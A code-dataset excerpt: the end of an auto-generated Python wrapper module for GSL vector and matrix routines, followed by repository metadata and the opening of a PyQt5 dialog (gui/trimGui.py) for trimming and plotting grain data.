gsl_vector_int_minmax_index = __block.gsl_vector_int_minmax_index
def gsl_vector_int_isnull(*args, **kwargs):
return __block.gsl_vector_int_isnull(*args, **kwargs)
gsl_vector_int_isnull = __block.gsl_vector_int_isnull
def gsl_matrix_int_set_zero(*args, **kwargs):
return __block.gsl_matrix_int_set_zero(*args, **kwargs)
gsl_matrix_int_set_zero = __block.gsl_matrix_int_set_zero
def gsl_matrix_int_set_all(*args, **kwargs):
return __block.gsl_matrix_int_set_all(*args, **kwargs)
gsl_matrix_int_set_all = __block.gsl_matrix_int_set_all
def gsl_matrix_int_set_identity(*args, **kwargs):
return __block.gsl_matrix_int_set_identity(*args, **kwargs)
gsl_matrix_int_set_identity = __block.gsl_matrix_int_set_identity
def gsl_matrix_int_fread(*args, **kwargs):
return __block.gsl_matrix_int_fread(*args, **kwargs)
gsl_matrix_int_fread = __block.gsl_matrix_int_fread
def gsl_matrix_int_fwrite(*args, **kwargs):
return __block.gsl_matrix_int_fwrite(*args, **kwargs)
gsl_matrix_int_fwrite = __block.gsl_matrix_int_fwrite
def gsl_matrix_int_fscanf(*args, **kwargs):
return __block.gsl_matrix_int_fscanf(*args, **kwargs)
gsl_matrix_int_fscanf = __block.gsl_matrix_int_fscanf
def gsl_matrix_int_fprintf(*args, **kwargs):
return __block.gsl_matrix_int_fprintf(*args, **kwargs)
gsl_matrix_int_fprintf = __block.gsl_matrix_int_fprintf
def gsl_matrix_int_swap(*args, **kwargs):
return __block.gsl_matrix_int_swap(*args, **kwargs)
gsl_matrix_int_swap = __block.gsl_matrix_int_swap
def gsl_matrix_int_swap_rows(*args, **kwargs):
return __block.gsl_matrix_int_swap_rows(*args, **kwargs)
gsl_matrix_int_swap_rows = __block.gsl_matrix_int_swap_rows
def gsl_matrix_int_swap_columns(*args, **kwargs):
return __block.gsl_matrix_int_swap_columns(*args, **kwargs)
gsl_matrix_int_swap_columns = __block.gsl_matrix_int_swap_columns
def gsl_matrix_int_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_int_swap_rowcol(*args, **kwargs)
gsl_matrix_int_swap_rowcol = __block.gsl_matrix_int_swap_rowcol
def gsl_matrix_int_transpose(*args, **kwargs):
return __block.gsl_matrix_int_transpose(*args, **kwargs)
gsl_matrix_int_transpose = __block.gsl_matrix_int_transpose
def gsl_matrix_int_max(*args, **kwargs):
return __block.gsl_matrix_int_max(*args, **kwargs)
gsl_matrix_int_max = __block.gsl_matrix_int_max
def gsl_matrix_int_min(*args, **kwargs):
return __block.gsl_matrix_int_min(*args, **kwargs)
gsl_matrix_int_min = __block.gsl_matrix_int_min
def gsl_matrix_int_minmax(*args, **kwargs):
return __block.gsl_matrix_int_minmax(*args, **kwargs)
gsl_matrix_int_minmax = __block.gsl_matrix_int_minmax
def gsl_matrix_int_max_index(*args, **kwargs):
return __block.gsl_matrix_int_max_index(*args, **kwargs)
gsl_matrix_int_max_index = __block.gsl_matrix_int_max_index
def gsl_matrix_int_min_index(*args, **kwargs):
return __block.gsl_matrix_int_min_index(*args, **kwargs)
gsl_matrix_int_min_index = __block.gsl_matrix_int_min_index
def gsl_matrix_int_minmax_index(*args, **kwargs):
return __block.gsl_matrix_int_minmax_index(*args, **kwargs)
gsl_matrix_int_minmax_index = __block.gsl_matrix_int_minmax_index
def gsl_matrix_int_isnull(*args, **kwargs):
return __block.gsl_matrix_int_isnull(*args, **kwargs)
gsl_matrix_int_isnull = __block.gsl_matrix_int_isnull
def gsl_matrix_int_diagonal(*args, **kwargs):
return __block.gsl_matrix_int_diagonal(*args, **kwargs)
gsl_matrix_int_diagonal = __block.gsl_matrix_int_diagonal
def gsl_matrix_int_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_int_subdiagonal(*args, **kwargs)
gsl_matrix_int_subdiagonal = __block.gsl_matrix_int_subdiagonal
def gsl_matrix_int_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_int_superdiagonal(*args, **kwargs)
gsl_matrix_int_superdiagonal = __block.gsl_matrix_int_superdiagonal
def gsl_vector_short_set_zero(*args, **kwargs):
return __block.gsl_vector_short_set_zero(*args, **kwargs)
gsl_vector_short_set_zero = __block.gsl_vector_short_set_zero
def gsl_vector_short_set_all(*args, **kwargs):
return __block.gsl_vector_short_set_all(*args, **kwargs)
gsl_vector_short_set_all = __block.gsl_vector_short_set_all
def gsl_vector_short_set_basis(*args, **kwargs):
return __block.gsl_vector_short_set_basis(*args, **kwargs)
gsl_vector_short_set_basis = __block.gsl_vector_short_set_basis
def gsl_vector_short_fread(*args, **kwargs):
return __block.gsl_vector_short_fread(*args, **kwargs)
gsl_vector_short_fread = __block.gsl_vector_short_fread
def gsl_vector_short_fwrite(*args, **kwargs):
return __block.gsl_vector_short_fwrite(*args, **kwargs)
gsl_vector_short_fwrite = __block.gsl_vector_short_fwrite
def gsl_vector_short_fscanf(*args, **kwargs):
return __block.gsl_vector_short_fscanf(*args, **kwargs)
gsl_vector_short_fscanf = __block.gsl_vector_short_fscanf
def gsl_vector_short_fprintf(*args, **kwargs):
return __block.gsl_vector_short_fprintf(*args, **kwargs)
gsl_vector_short_fprintf = __block.gsl_vector_short_fprintf
def gsl_vector_short_reverse(*args, **kwargs):
return __block.gsl_vector_short_reverse(*args, **kwargs)
gsl_vector_short_reverse = __block.gsl_vector_short_reverse
def gsl_vector_short_swap(*args, **kwargs):
return __block.gsl_vector_short_swap(*args, **kwargs)
gsl_vector_short_swap = __block.gsl_vector_short_swap
def gsl_vector_short_swap_elements(*args, **kwargs):
return __block.gsl_vector_short_swap_elements(*args, **kwargs)
gsl_vector_short_swap_elements = __block.gsl_vector_short_swap_elements
def gsl_vector_short_max(*args, **kwargs):
return __block.gsl_vector_short_max(*args, **kwargs)
gsl_vector_short_max = __block.gsl_vector_short_max
def gsl_vector_short_min(*args, **kwargs):
return __block.gsl_vector_short_min(*args, **kwargs)
gsl_vector_short_min = __block.gsl_vector_short_min
def gsl_vector_short_minmax(*args, **kwargs):
return __block.gsl_vector_short_minmax(*args, **kwargs)
gsl_vector_short_minmax = __block.gsl_vector_short_minmax
def gsl_vector_short_max_index(*args, **kwargs):
return __block.gsl_vector_short_max_index(*args, **kwargs)
gsl_vector_short_max_index = __block.gsl_vector_short_max_index
def gsl_vector_short_min_index(*args, **kwargs):
return __block.gsl_vector_short_min_index(*args, **kwargs)
gsl_vector_short_min_index = __block.gsl_vector_short_min_index
def gsl_vector_short_minmax_index(*args, **kwargs):
return __block.gsl_vector_short_minmax_index(*args, **kwargs)
gsl_vector_short_minmax_index = __block.gsl_vector_short_minmax_index
def gsl_vector_short_isnull(*args, **kwargs):
return __block.gsl_vector_short_isnull(*args, **kwargs)
gsl_vector_short_isnull = __block.gsl_vector_short_isnull
def gsl_matrix_short_set_zero(*args, **kwargs):
return __block.gsl_matrix_short_set_zero(*args, **kwargs)
gsl_matrix_short_set_zero = __block.gsl_matrix_short_set_zero
def gsl_matrix_short_set_all(*args, **kwargs):
return __block.gsl_matrix_short_set_all(*args, **kwargs)
gsl_matrix_short_set_all = __block.gsl_matrix_short_set_all
def gsl_matrix_short_set_identity(*args, **kwargs):
return __block.gsl_matrix_short_set_identity(*args, **kwargs)
gsl_matrix_short_set_identity = __block.gsl_matrix_short_set_identity
def gsl_matrix_short_fread(*args, **kwargs):
return __block.gsl_matrix_short_fread(*args, **kwargs)
gsl_matrix_short_fread = __block.gsl_matrix_short_fread
def gsl_matrix_short_fwrite(*args, **kwargs):
return __block.gsl_matrix_short_fwrite(*args, **kwargs)
gsl_matrix_short_fwrite = __block.gsl_matrix_short_fwrite
def gsl_matrix_short_fscanf(*args, **kwargs):
return __block.gsl_matrix_short_fscanf(*args, **kwargs)
gsl_matrix_short_fscanf = __block.gsl_matrix_short_fscanf
def gsl_matrix_short_fprintf(*args, **kwargs):
return __block.gsl_matrix_short_fprintf(*args, **kwargs)
gsl_matrix_short_fprintf = __block.gsl_matrix_short_fprintf
def gsl_matrix_short_swap(*args, **kwargs):
return __block.gsl_matrix_short_swap(*args, **kwargs)
gsl_matrix_short_swap = __block.gsl_matrix_short_swap
def gsl_matrix_short_swap_rows(*args, **kwargs):
return __block.gsl_matrix_short_swap_rows(*args, **kwargs)
gsl_matrix_short_swap_rows = __block.gsl_matrix_short_swap_rows
def gsl_matrix_short_swap_columns(*args, **kwargs):
return __block.gsl_matrix_short_swap_columns(*args, **kwargs)
gsl_matrix_short_swap_columns = __block.gsl_matrix_short_swap_columns
def gsl_matrix_short_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_short_swap_rowcol(*args, **kwargs)
gsl_matrix_short_swap_rowcol = __block.gsl_matrix_short_swap_rowcol
def gsl_matrix_short_transpose(*args, **kwargs):
return __block.gsl_matrix_short_transpose(*args, **kwargs)
gsl_matrix_short_transpose = __block.gsl_matrix_short_transpose
def gsl_matrix_short_max(*args, **kwargs):
return __block.gsl_matrix_short_max(*args, **kwargs)
gsl_matrix_short_max = __block.gsl_matrix_short_max
def gsl_matrix_short_min(*args, **kwargs):
return __block.gsl_matrix_short_min(*args, **kwargs)
gsl_matrix_short_min = __block.gsl_matrix_short_min
def gsl_matrix_short_minmax(*args, **kwargs):
return __block.gsl_matrix_short_minmax(*args, **kwargs)
gsl_matrix_short_minmax = __block.gsl_matrix_short_minmax
def gsl_matrix_short_max_index(*args, **kwargs):
return __block.gsl_matrix_short_max_index(*args, **kwargs)
gsl_matrix_short_max_index = __block.gsl_matrix_short_max_index
def gsl_matrix_short_min_index(*args, **kwargs):
return __block.gsl_matrix_short_min_index(*args, **kwargs)
gsl_matrix_short_min_index = __block.gsl_matrix_short_min_index
def gsl_matrix_short_minmax_index(*args, **kwargs):
return __block.gsl_matrix_short_minmax_index(*args, **kwargs)
gsl_matrix_short_minmax_index = __block.gsl_matrix_short_minmax_index
def gsl_matrix_short_isnull(*args, **kwargs):
return __block.gsl_matrix_short_isnull(*args, **kwargs)
gsl_matrix_short_isnull = __block.gsl_matrix_short_isnull
def gsl_matrix_short_diagonal(*args, **kwargs):
return __block.gsl_matrix_short_diagonal(*args, **kwargs)
gsl_matrix_short_diagonal = __block.gsl_matrix_short_diagonal
def gsl_matrix_short_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_short_subdiagonal(*args, **kwargs)
gsl_matrix_short_subdiagonal = __block.gsl_matrix_short_subdiagonal
def gsl_matrix_short_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_short_superdiagonal(*args, **kwargs)
gsl_matrix_short_superdiagonal = __block.gsl_matrix_short_superdiagonal
def gsl_vector_char_set_zero(*args, **kwargs):
return __block.gsl_vector_char_set_zero(*args, **kwargs)
gsl_vector_char_set_zero = __block.gsl_vector_char_set_zero
def gsl_vector_char_set_all(*args, **kwargs):
return __block.gsl_vector_char_set_all(*args, **kwargs)
gsl_vector_char_set_all = __block.gsl_vector_char_set_all
def gsl_vector_char_set_basis(*args, **kwargs):
return __block.gsl_vector_char_set_basis(*args, **kwargs)
gsl_vector_char_set_basis = __block.gsl_vector_char_set_basis
def gsl_vector_char_fread(*args, **kwargs):
return __block.gsl_vector_char_fread(*args, **kwargs)
gsl_vector_char_fread = __block.gsl_vector_char_fread
def gsl_vector_char_fwrite(*args, **kwargs):
return __block.gsl_vector_char_fwrite(*args, **kwargs)
gsl_vector_char_fwrite = __block.gsl_vector_char_fwrite
def gsl_vector_char_fscanf(*args, **kwargs):
return __block.gsl_vector_char_fscanf(*args, **kwargs)
gsl_vector_char_fscanf = __block.gsl_vector_char_fscanf
def gsl_vector_char_fprintf(*args, **kwargs):
return __block.gsl_vector_char_fprintf(*args, **kwargs)
gsl_vector_char_fprintf = __block.gsl_vector_char_fprintf
def gsl_vector_char_reverse(*args, **kwargs):
return __block.gsl_vector_char_reverse(*args, **kwargs)
gsl_vector_char_reverse = __block.gsl_vector_char_reverse
def gsl_vector_char_swap(*args, **kwargs):
return __block.gsl_vector_char_swap(*args, **kwargs)
gsl_vector_char_swap = __block.gsl_vector_char_swap
def gsl_vector_char_swap_elements(*args, **kwargs):
return __block.gsl_vector_char_swap_elements(*args, **kwargs)
gsl_vector_char_swap_elements = __block.gsl_vector_char_swap_elements
def gsl_vector_char_max(*args, **kwargs):
return __block.gsl_vector_char_max(*args, **kwargs)
gsl_vector_char_max = __block.gsl_vector_char_max
def gsl_vector_char_min(*args, **kwargs):
return __block.gsl_vector_char_min(*args, **kwargs)
gsl_vector_char_min = __block.gsl_vector_char_min
def gsl_vector_char_minmax(*args, **kwargs):
return __block.gsl_vector_char_minmax(*args, **kwargs)
gsl_vector_char_minmax = __block.gsl_vector_char_minmax
def gsl_vector_char_max_index(*args, **kwargs):
return __block.gsl_vector_char_max_index(*args, **kwargs)
gsl_vector_char_max_index = __block.gsl_vector_char_max_index
def gsl_vector_char_min_index(*args, **kwargs):
return __block.gsl_vector_char_min_index(*args, **kwargs)
gsl_vector_char_min_index = __block.gsl_vector_char_min_index
def gsl_vector_char_minmax_index(*args, **kwargs):
return __block.gsl_vector_char_minmax_index(*args, **kwargs)
gsl_vector_char_minmax_index = __block.gsl_vector_char_minmax_index
def gsl_vector_char_isnull(*args, **kwargs):
return __block.gsl_vector_char_isnull(*args, **kwargs)
gsl_vector_char_isnull = __block.gsl_vector_char_isnull
def gsl_matrix_char_set_zero(*args, **kwargs):
return __block.gsl_matrix_char_set_zero(*args, **kwargs)
gsl_matrix_char_set_zero = __block.gsl_matrix_char_set_zero
def gsl_matrix_char_set_all(*args, **kwargs):
return __block.gsl_matrix_char_set_all(*args, **kwargs)
gsl_matrix_char_set_all = __block.gsl_matrix_char_set_all
def gsl_matrix_char_set_identity(*args, **kwargs):
return __block.gsl_matrix_char_set_identity(*args, **kwargs)
gsl_matrix_char_set_identity = __block.gsl_matrix_char_set_identity
def gsl_matrix_char_fread(*args, **kwargs):
return __block.gsl_matrix_char_fread(*args, **kwargs)
gsl_matrix_char_fread = __block.gsl_matrix_char_fread
def gsl_matrix_char_fwrite(*args, **kwargs):
return __block.gsl_matrix_char_fwrite(*args, **kwargs)
gsl_matrix_char_fwrite = __block.gsl_matrix_char_fwrite
def gsl_matrix_char_fscanf(*args, **kwargs):
return __block.gsl_matrix_char_fscanf(*args, **kwargs)
gsl_matrix_char_fscanf = __block.gsl_matrix_char_fscanf
def gsl_matrix_char_fprintf(*args, **kwargs):
return __block.gsl_matrix_char_fprintf(*args, **kwargs)
gsl_matrix_char_fprintf = __block.gsl_matrix_char_fprintf
def gsl_matrix_char_swap(*args, **kwargs):
return __block.gsl_matrix_char_swap(*args, **kwargs)
gsl_matrix_char_swap = __block.gsl_matrix_char_swap
def gsl_matrix_char_swap_rows(*args, **kwargs):
return __block.gsl_matrix_char_swap_rows(*args, **kwargs)
gsl_matrix_char_swap_rows = __block.gsl_matrix_char_swap_rows
def gsl_matrix_char_swap_columns(*args, **kwargs):
return __block.gsl_matrix_char_swap_columns(*args, **kwargs)
gsl_matrix_char_swap_columns = __block.gsl_matrix_char_swap_columns
def gsl_matrix_char_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_char_swap_rowcol(*args, **kwargs)
gsl_matrix_char_swap_rowcol = __block.gsl_matrix_char_swap_rowcol
def gsl_matrix_char_transpose(*args, **kwargs):
return __block.gsl_matrix_char_transpose(*args, **kwargs)
gsl_matrix_char_transpose = __block.gsl_matrix_char_transpose
def gsl_matrix_char_max(*args, **kwargs):
return __block.gsl_matrix_char_max(*args, **kwargs)
gsl_matrix_char_max = __block.gsl_matrix_char_max
def gsl_matrix_char_min(*args, **kwargs):
return __block.gsl_matrix_char_min(*args, **kwargs)
gsl_matrix_char_min = __block.gsl_matrix_char_min
def gsl_matrix_char_minmax(*args, **kwargs):
return __block.gsl_matrix_char_minmax(*args, **kwargs)
gsl_matrix_char_minmax = __block.gsl_matrix_char_minmax
def gsl_matrix_char_max_index(*args, **kwargs):
return __block.gsl_matrix_char_max_index(*args, **kwargs)
gsl_matrix_char_max_index = __block.gsl_matrix_char_max_index
def gsl_matrix_char_min_index(*args, **kwargs):
return __block.gsl_matrix_char_min_index(*args, **kwargs)
gsl_matrix_char_min_index = __block.gsl_matrix_char_min_index
def gsl_matrix_char_minmax_index(*args, **kwargs):
return __block.gsl_matrix_char_minmax_index(*args, **kwargs)
gsl_matrix_char_minmax_index = __block.gsl_matrix_char_minmax_index
def gsl_matrix_char_isnull(*args, **kwargs):
return __block.gsl_matrix_char_isnull(*args, **kwargs)
gsl_matrix_char_isnull = __block.gsl_matrix_char_isnull
def gsl_matrix_char_diagonal(*args, **kwargs):
return __block.gsl_matrix_char_diagonal(*args, **kwargs)
gsl_matrix_char_diagonal = __block.gsl_matrix_char_diagonal
def gsl_matrix_char_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_char_subdiagonal(*args, **kwargs)
gsl_matrix_char_subdiagonal = __block.gsl_matrix_char_subdiagonal
def gsl_matrix_char_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_char_superdiagonal(*args, **kwargs)
gsl_matrix_char_superdiagonal = __block.gsl_matrix_char_superdiagonal
def gsl_vector_complex_set_zero(*args, **kwargs):
return __block.gsl_vector_complex_set_zero(*args, **kwargs)
gsl_vector_complex_set_zero = __block.gsl_vector_complex_set_zero
def gsl_vector_complex_set_all(*args, **kwargs):
return __block.gsl_vector_complex_set_all(*args, **kwargs)
gsl_vector_complex_set_all = __block.gsl_vector_complex_set_all
def gsl_vector_complex_set_basis(*args, **kwargs):
return __block.gsl_vector_complex_set_basis(*args, **kwargs)
gsl_vector_complex_set_basis = __block.gsl_vector_complex_set_basis
def gsl_vector_complex_fread(*args, **kwargs):
return __block.gsl_vector_complex_fread(*args, **kwargs)
gsl_vector_complex_fread = __block.gsl_vector_complex_fread
def gsl_vector_complex_fwrite(*args, **kwargs):
return __block.gsl_vector_complex_fwrite(*args, **kwargs)
gsl_vector_complex_fwrite = __block.gsl_vector_complex_fwrite
def gsl_vector_complex_fscanf(*args, **kwargs):
return __block.gsl_vector_complex_fscanf(*args, **kwargs)
gsl_vector_complex_fscanf = __block.gsl_vector_complex_fscanf
def gsl_vector_complex_fprintf(*args, **kwargs):
return __block.gsl_vector_complex_fprintf(*args, **kwargs)
gsl_vector_complex_fprintf = __block.gsl_vector_complex_fprintf
def gsl_vector_complex_reverse(*args, **kwargs):
return __block.gsl_vector_complex_reverse(*args, **kwargs)
gsl_vector_complex_reverse = __block.gsl_vector_complex_reverse
def gsl_vector_complex_swap(*args, **kwargs):
return __block.gsl_vector_complex_swap(*args, **kwargs)
gsl_vector_complex_swap = __block.gsl_vector_complex_swap
def gsl_vector_complex_swap_elements(*args, **kwargs):
return __block.gsl_vector_complex_swap_elements(*args, **kwargs)
gsl_vector_complex_swap_elements = __block.gsl_vector_complex_swap_elements
def gsl_vector_complex_isnull(*args, **kwargs):
return __block.gsl_vector_complex_isnull(*args, **kwargs)
gsl_vector_complex_isnull = __block.gsl_vector_complex_isnull
def gsl_matrix_complex_set_zero(*args, **kwargs):
return __block.gsl_matrix_complex_set_zero(*args, **kwargs)
gsl_matrix_complex_set_zero = __block.gsl_matrix_complex_set_zero
def gsl_matrix_complex_set_all(*args, **kwargs):
return __block.gsl_matrix_complex_set_all(*args, **kwargs)
gsl_matrix_complex_set_all = __block.gsl_matrix_complex_set_all
def gsl_matrix_complex_set_identity(*args, **kwargs):
return __block.gsl_matrix_complex_set_identity(*args, **kwargs)
gsl_matrix_complex_set_identity = __block.gsl_matrix_complex_set_identity
def gsl_matrix_complex_fread(*args, **kwargs):
return __block.gsl_matrix_complex_fread(*args, **kwargs)
gsl_matrix_complex_fread = __block.gsl_matrix_complex_fread
def gsl_matrix_complex_fwrite(*args, **kwargs):
return __block.gsl_matrix_complex_fwrite(*args, **kwargs)
gsl_matrix_complex_fwrite = __block.gsl_matrix_complex_fwrite
def gsl_matrix_complex_fscanf(*args, **kwargs):
return __block.gsl_matrix_complex_fscanf(*args, **kwargs)
gsl_matrix_complex_fscanf = __block.gsl_matrix_complex_fscanf
def gsl_matrix_complex_fprintf(*args, **kwargs):
return __block.gsl_matrix_complex_fprintf(*args, **kwargs)
gsl_matrix_complex_fprintf = __block.gsl_matrix_complex_fprintf
def gsl_matrix_complex_swap(*args, **kwargs):
return __block.gsl_matrix_complex_swap(*args, **kwargs)
gsl_matrix_complex_swap = __block.gsl_matrix_complex_swap
def gsl_matrix_complex_swap_rows(*args, **kwargs):
return __block.gsl_matrix_complex_swap_rows(*args, **kwargs)
gsl_matrix_complex_swap_rows = __block.gsl_matrix_complex_swap_rows
def gsl_matrix_complex_swap_columns(*args, **kwargs):
return __block.gsl_matrix_complex_swap_columns(*args, **kwargs)
gsl_matrix_complex_swap_columns = __block.gsl_matrix_complex_swap_columns
def gsl_matrix_complex_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_complex_swap_rowcol(*args, **kwargs)
gsl_matrix_complex_swap_rowcol = __block.gsl_matrix_complex_swap_rowcol
def gsl_matrix_complex_transpose(*args, **kwargs):
return __block.gsl_matrix_complex_transpose(*args, **kwargs)
gsl_matrix_complex_transpose = __block.gsl_matrix_complex_transpose
def gsl_matrix_complex_isnull(*args, **kwargs):
return __block.gsl_matrix_complex_isnull(*args, **kwargs)
gsl_matrix_complex_isnull = __block.gsl_matrix_complex_isnull
def gsl_matrix_complex_diagonal(*args, **kwargs):
return __block.gsl_matrix_complex_diagonal(*args, **kwargs)
gsl_matrix_complex_diagonal = __block.gsl_matrix_complex_diagonal
def gsl_matrix_complex_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_complex_subdiagonal(*args, **kwargs)
gsl_matrix_complex_subdiagonal = __block.gsl_matrix_complex_subdiagonal
def gsl_matrix_complex_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_complex_superdiagonal(*args, **kwargs)
gsl_matrix_complex_superdiagonal = __block.gsl_matrix_complex_superdiagonal
def gsl_vector_complex_float_set_zero(*args, **kwargs):
return __block.gsl_vector_complex_float_set_zero(*args, **kwargs)
gsl_vector_complex_float_set_zero = __block.gsl_vector_complex_float_set_zero
def gsl_vector_complex_float_set_all(*args, **kwargs):
return __block.gsl_vector_complex_float_set_all(*args, **kwargs)
gsl_vector_complex_float_set_all = __block.gsl_vector_complex_float_set_all
def gsl_vector_complex_float_set_basis(*args, **kwargs):
return __block.gsl_vector_complex_float_set_basis(*args, **kwargs)
gsl_vector_complex_float_set_basis = __block.gsl_vector_complex_float_set_basis
def gsl_vector_complex_float_fread(*args, **kwargs):
return __block.gsl_vector_complex_float_fread(*args, **kwargs)
gsl_vector_complex_float_fread = __block.gsl_vector_complex_float_fread
def gsl_vector_complex_float_fwrite(*args, **kwargs):
return __block.gsl_vector_complex_float_fwrite(*args, **kwargs)
gsl_vector_complex_float_fwrite = __block.gsl_vector_complex_float_fwrite
def gsl_vector_complex_float_fscanf(*args, **kwargs):
return __block.gsl_vector_complex_float_fscanf(*args, **kwargs)
gsl_vector_complex_float_fscanf = __block.gsl_vector_complex_float_fscanf
def gsl_vector_complex_float_fprintf(*args, **kwargs):
return __block.gsl_vector_complex_float_fprintf(*args, **kwargs)
gsl_vector_complex_float_fprintf = __block.gsl_vector_complex_float_fprintf
def gsl_vector_complex_float_reverse(*args, **kwargs):
return __block.gsl_vector_complex_float_reverse(*args, **kwargs)
gsl_vector_complex_float_reverse = __block.gsl_vector_complex_float_reverse
def gsl_vector_complex_float_swap(*args, **kwargs):
return __block.gsl_vector_complex_float_swap(*args, **kwargs)
gsl_vector_complex_float_swap = __block.gsl_vector_complex_float_swap
def gsl_vector_complex_float_swap_elements(*args, **kwargs):
return __block.gsl_vector_complex_float_swap_elements(*args, **kwargs)
gsl_vector_complex_float_swap_elements = __block.gsl_vector_complex_float_swap_elements
def gsl_vector_complex_float_isnull(*args, **kwargs):
return __block.gsl_vector_complex_float_isnull(*args, **kwargs)
gsl_vector_complex_float_isnull = __block.gsl_vector_complex_float_isnull
def gsl_matrix_complex_float_set_zero(*args, **kwargs):
return __block.gsl_matrix_complex_float_set_zero(*args, **kwargs)
gsl_matrix_complex_float_set_zero = __block.gsl_matrix_complex_float_set_zero
def gsl_matrix_complex_float_set_all(*args, **kwargs):
return __block.gsl_matrix_complex_float_set_all(*args, **kwargs)
gsl_matrix_complex_float_set_all = __block.gsl_matrix_complex_float_set_all
def gsl_matrix_complex_float_set_identity(*args, **kwargs):
return __block.gsl_matrix_complex_float_set_identity(*args, **kwargs)
gsl_matrix_complex_float_set_identity = __block.gsl_matrix_complex_float_set_identity
def gsl_matrix_complex_float_fread(*args, **kwargs):
return __block.gsl_matrix_complex_float_fread(*args, **kwargs)
gsl_matrix_complex_float_fread = __block.gsl_matrix_complex_float_fread
def gsl_matrix_complex_float_fwrite(*args, **kwargs):
return __block.gsl_matrix_complex_float_fwrite(*args, **kwargs)
gsl_matrix_complex_float_fwrite = __block.gsl_matrix_complex_float_fwrite
def gsl_matrix_complex_float_fscanf(*args, **kwargs):
return __block.gsl_matrix_complex_float_fscanf(*args, **kwargs)
gsl_matrix_complex_float_fscanf = __block.gsl_matrix_complex_float_fscanf
def gsl_matrix_complex_float_fprintf(*args, **kwargs):
return __block.gsl_matrix_complex_float_fprintf(*args, **kwargs)
gsl_matrix_complex_float_fprintf = __block.gsl_matrix_complex_float_fprintf
def gsl_matrix_complex_float_swap(*args, **kwargs):
return __block.gsl_matrix_complex_float_swap(*args, **kwargs)
gsl_matrix_complex_float_swap = __block.gsl_matrix_complex_float_swap
def gsl_matrix_complex_float_swap_rows(*args, **kwargs):
return __block.gsl_matrix_complex_float_swap_rows(*args, **kwargs)
gsl_matrix_complex_float_swap_rows = __block.gsl_matrix_complex_float_swap_rows
def gsl_matrix_complex_float_swap_columns(*args, **kwargs):
return __block.gsl_matrix_complex_float_swap_columns(*args, **kwargs)
gsl_matrix_complex_float_swap_columns = __block.gsl_matrix_complex_float_swap_columns
def gsl_matrix_complex_float_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_complex_float_swap_rowcol(*args, **kwargs)
gsl_matrix_complex_float_swap_rowcol = __block.gsl_matrix_complex_float_swap_rowcol
def gsl_matrix_complex_float_transpose(*args, **kwargs):
return __block.gsl_matrix_complex_float_transpose(*args, **kwargs)
gsl_matrix_complex_float_transpose = __block.gsl_matrix_complex_float_transpose
def gsl_matrix_complex_float_isnull(*args, **kwargs):
return __block.gsl_matrix_complex_float_isnull(*args, **kwargs)
gsl_matrix_complex_float_isnull = __block.gsl_matrix_complex_float_isnull
def gsl_matrix_complex_float_diagonal(*args, **kwargs):
return __block.gsl_matrix_complex_float_diagonal(*args, **kwargs)
gsl_matrix_complex_float_diagonal = __block.gsl_matrix_complex_float_diagonal
def gsl_matrix_complex_float_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_complex_float_subdiagonal(*args, **kwargs)
gsl_matrix_complex_float_subdiagonal = __block.gsl_matrix_complex_float_subdiagonal
def gsl_matrix_complex_float_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_complex_float_superdiagonal(*args, **kwargs)
gsl_matrix_complex_float_superdiagonal = __block.gsl_matrix_complex_float_superdiagonal
# This file is compatible with both classic and new-style classes.
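# Usage sketch (an illustration only, under the assumption that the matching
# alloc/free wrappers are defined earlier in this module, as in the GSL C API):
# v = gsl_vector_long_alloc(3)        # allocate a 3-element long vector
# gsl_vector_long_set_all(v, 7)       # every element becomes 7
# assert gsl_vector_long_max(v) == 7  # max of a constant vector
# gsl_vector_long_free(v)             # release the native memory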
| 41.161369 | 90 | 0.825542 |
4d42f4da01153d9efccca4d19cc6efc9b683c41b
| 8,039 |
py
|
Python
|
gui/trimGui.py
|
lhalb/gfmanager
|
449f071b3239faa672b7f06122dfc9bc23e68d79
|
[
"MIT"
] | 1 |
2022-01-18T12:53:17.000Z
|
2022-01-18T12:53:17.000Z
|
gui/trimGui.py
|
lhalb/gfmanager
|
449f071b3239faa672b7f06122dfc9bc23e68d79
|
[
"MIT"
] | null | null | null |
gui/trimGui.py
|
lhalb/gfmanager
|
449f071b3239faa672b7f06122dfc9bc23e68d79
|
[
"MIT"
] | null | null | null |
from PyQt5 import QtGui, QtWidgets
import seaborn as sns
from gui import trimming as tri
from gui import boxes as BOX
import matplotlib.image as mpimg
from math import floor, ceil
class TrimDialog(QtWidgets.QDialog, tri.Ui_Dialog):
def __init__(self, data=None):
super(TrimDialog, self).__init__()
self.setupUi(self)
        # Set the window icon
icon = QtGui.QIcon(":/img/icons/trim.png")
self.setWindowIcon(icon)
self.trim_data = data
self.cal_val = 1
# Fill Combo-Box
additems = [i for i in data.columns if i not in ['pos-x', 'pos-y', 'edge']]
self.cb_cols.addItems(additems)
# Init Data-Plot
self.plt_data = self.dataPlot.canvas
self.data_ax = self.plt_data.fig.add_subplot(111)
self.init_slider()
self.update_violin()
self.vline = self.data_ax.axvline(data[self.cb_cols.currentText()].min(), color='r')
self.vline_max = self.data_ax.axvline(ceil(data[self.cb_cols.currentText()].max()), color='b')
# Init Image-Plot
self.imagePlot.hide()
self.plt_image = self.imagePlot.canvas
self.image_ax = self.plt_image.fig.add_subplot(111)
self.scat, = self.image_ax.plot([], [], marker='o', ms=5, ls='', color='r')
        # connect the signal handlers last
self.setup_triggers()
def setup_triggers(self):
self.sliderTRIM_min.valueChanged.connect(self.update_data)
self.sliderTRIM_max.valueChanged.connect(self.update_data)
self.but_openImage.clicked.connect(self.load_image)
self.cb_cols.currentTextChanged.connect(self.update_element)
self.cb_edgeGrains.clicked.connect(self.update_element)
self.txt_kalwert.returnPressed.connect(self.update_cal_val)
self.lab_cut_min.editingFinished.connect(self.set_min_slider)
self.lab_cut_max.editingFinished.connect(self.set_max_slider)
self.but_cut_min.clicked.connect(self.manipulate_max)
self.but_cut_max.clicked.connect(self.manipulate_min)
